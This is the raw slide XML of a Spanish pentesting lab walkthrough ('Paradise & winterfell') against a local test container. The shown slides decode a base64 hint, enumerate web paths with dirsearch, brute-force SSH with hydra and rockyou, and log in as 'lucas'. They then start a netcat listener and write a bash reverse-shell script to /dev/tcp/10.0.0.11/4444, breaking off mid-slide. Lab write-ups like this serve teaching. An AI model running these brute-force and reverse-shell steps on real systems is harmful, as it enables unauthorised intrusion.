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85" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId36"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="262" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261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4" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="273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92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69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41558B-6FE1-44EF-B1B2-0FFC19AE15E4}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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2B82F2-D6F6-4DA4-A3D5-15753D1199D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310249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2B82F2-D6F6-4DA4-A3D5-15753D1199D5}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>34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4792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chemeClr val="tx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53B2596-BD76-40A4-BCDE-2612E1E2F01B}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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6BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr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43101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F3FDD-4F8B-4A56-907C-60EA012B8016}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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BC4D70-09CE-4F0E-B2C6-906B4EBE3D7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47390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EA934F-A903-473E-97A6-F6057C9A06E9}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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BC4D70-09CE-4F0E-B2C6-906B4EBE3D7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37841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EC81D-2203-4EB3-9EBD-676880BF35C1}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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BC4D70-09CE-4F0E-B2C6-906B4EBE3D7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064477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7200" b="0" cap="all" baseline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701FC-4E23-4D23-901C-6F12AC5392FF}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES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87701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834272-D1EC-4E7C-A525-494EBC51EADF}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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BC4D70-09CE-4F0E-B2C6-906B4EBE3D7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625004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B5D323-C501-41D5-8EDA-C637EFE51A90}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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BC4D70-09CE-4F0E-B2C6-906B4EBE3D7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634098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5CBF22-2036-4B35-BD44-83FD396F3C15}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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BC4D70-09CE-4F0E-B2C6-906B4EBE3D7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014845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BF9BC-8AFA-48FA-952E-2E2345C377D2}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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BC4D70-09CE-4F0E-B2C6-906B4EBE3D7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909737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9F33D-850F-468C-8776-C73B1873ED75}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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BC4D70-09CE-4F0E-B2C6-906B4EBE3D7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215355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3CA9A-257A-4D1C-9AB2-80959CE239F5}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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BC4D70-09CE-4F0E-B2C6-906B4EBE3D7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966690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7F31FBE1-6583-4DA7-83CE-DA2C0E1F3D1A}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>09/10/2025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E6BC4D70-09CE-4F0E-B2C6-906B4EBE3D7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207876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86" r:id="rId1"/>
    <p:sldLayoutId id="2147484087" r:id="rId2"/>
    <p:sldLayoutId id="2147484088" r:id="rId3"/>
    <p:sldLayoutId id="2147484089" r:id="rId4"/>
    <p:sldLayoutId id="2147484090" r:id="rId5"/>
    <p:sldLayoutId id="2147484091" r:id="rId6"/>
    <p:sldLayoutId id="2147484092" r:id="rId7"/>
    <p:sldLayoutId id="2147484093" r:id="rId8"/>
    <p:sldLayoutId id="2147484094" r:id="rId9"/>
    <p:sldLayoutId id="2147484095" r:id="rId10"/>
    <p:sldLayoutId id="2147484096" r:id="rId11"/>
  </p:sldLayoutIdLst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0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1400"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx1"/>
        </a:buClr>
        <a:buSzPct val="80000"/>
        <a:buFont typeface="Corbe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19A8AEC-2AEF-4112-8547-28B920A1C72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s-ES" dirty="0" err="1"/>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Paradise </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>winterfell</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES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44F56EC-7B27-4584-B05A-6025F9CEF90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/>
              <a:t>Luis Díaz Moreno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ED27C01D-46FB-46B6-9806-67F535FD21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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77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735370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F6A5AF-17A0-48A4-BC3E-D903A66C2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b="1" dirty="0" err="1"/>
              <a:t>Andy´s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t> House</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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80A99BAD-0C32-4B59-80E1-6F538B8D513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143000" y="4408609"/>
            <a:ext cx="4035869" cy="2060627"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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33BFA756-E1BB-439F-95F2-C5AB4AD4F37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143000" y="2209041"/>
            <a:ext cx="4064728" cy="2060627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27BC7424-DC47-4206-9778-30022B287D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7476" y="3209424"/>
            <a:ext cx="5401524" cy="2060627"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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0E1344D-0574-4E3B-9BDC-2B7B8C103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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"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466312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1F5F63-6881-426D-B930-6684390DA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b="1" dirty="0"/>
              <a:t>Comentario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>Andy´s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t> House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D80D97D-C970-421A-A4CB-6DC91257C7E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s-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Se trata de una codificación, lo descodificamos.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Nos da la frase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>estoesunsecreto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo ZXN0b2VzdW5zZWNyZXRvCg== | base 64 –d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Resulta que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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estoesunsecreto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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es una extensión de la web.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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pl-PL" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dirsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -u 172.17.0.2 -w psw.txt</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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mensaje_para_lucas.txt:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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su contraseña es muy vulnerable a ataques de fuerza bruta.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B35F07C2-EFB0-4F35-94DF-07106B2B5F6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933843" y="2057399"/>
            <a:ext cx="4115157" cy="536494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40D5F79B-4730-463E-9B97-9C3A25CA66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0659" y="2685332"/>
            <a:ext cx="5401524" cy="1292464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D9ACCACA-133E-4472-A5BE-29CE19607D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0659" y="4300894"/>
            <a:ext cx="1919289" cy="1221365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511FC352-C31A-4454-8175-8ADD756B5B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01318" y="4300894"/>
            <a:ext cx="3390865" cy="521318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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F3159D08-BB55-40E3-A679-30B978C80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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>11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477184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82DC83-0B81-407C-80EF-E286D0DB73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b="1" dirty="0"/>
              <a:t>Fuerza Bruta: lucas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132E418-7FEF-4B79-99EB-6AE7661F7BF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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Arial monospaced for SAP" panose="020B06090202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Cogemos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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las 30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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primeras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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palabras de rockyou.txt.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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metemos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Arial monospaced for SAP" panose="020B06090202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en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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un codes.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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cat rockyou.txt | head -n 30 rockyou.txt</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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s-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-l lucas -P codes.txt ssh://172.17.0.2 -t64 –f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Hemos obtenida la contraseña de lucas, chocolate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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lucas@172.17.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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3E55C0F0-A11B-4293-B240-50690A309B7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281907" y="4025688"/>
            <a:ext cx="5270126" cy="588872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FE143B18-8D99-43B2-9DDA-98693CEA2F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7596" y="1743912"/>
            <a:ext cx="1538988" cy="2125269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CE642E71-2669-4A01-9ECF-2C21331076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7695" y="4771067"/>
            <a:ext cx="3638550" cy="1681410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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74127294-E2A2-47F3-83F8-BD524C946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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>12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589211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37D51B-3ACD-48CF-9FE6-2AE4387355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b="1" dirty="0"/>
              <a:t>lucas@172.17.0.2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65C2A2D-E2A1-4DF0-993B-9956B8B3907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ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-la</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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No muestra nada relevante.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo –l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ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Nos muestra un único comando sudo, concretamente /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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/sed, como usuario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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andy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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perdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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contraseña.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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7890646F-CC6B-473A-8CCF-60AFC3A41B7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267450" y="3375491"/>
            <a:ext cx="4754563" cy="1386542"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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D0E6D48-0138-472B-927C-162F93052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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>13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297903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5008A3-23EA-43B5-B97C-32197CB18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b="1" dirty="0"/>
              <a:t>lucas@172.17.0.2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B357D5B-BB96-4021-B311-E17E789F6BD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r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Montamos un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> en nuestra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (esperamos conexiones entrantes por el puerto 4444).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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nc -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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lnvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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4444</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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s-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Creamos en /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/rev.py, un script Python que ejecutado como sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>andy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, y conectará de vuelta a tu Kali (reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cat &gt; /tmp/rev.sh &lt;&lt;’SH’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;#!/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;/bin/bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/10.0.0.11/4444 0&amp;1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;SH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
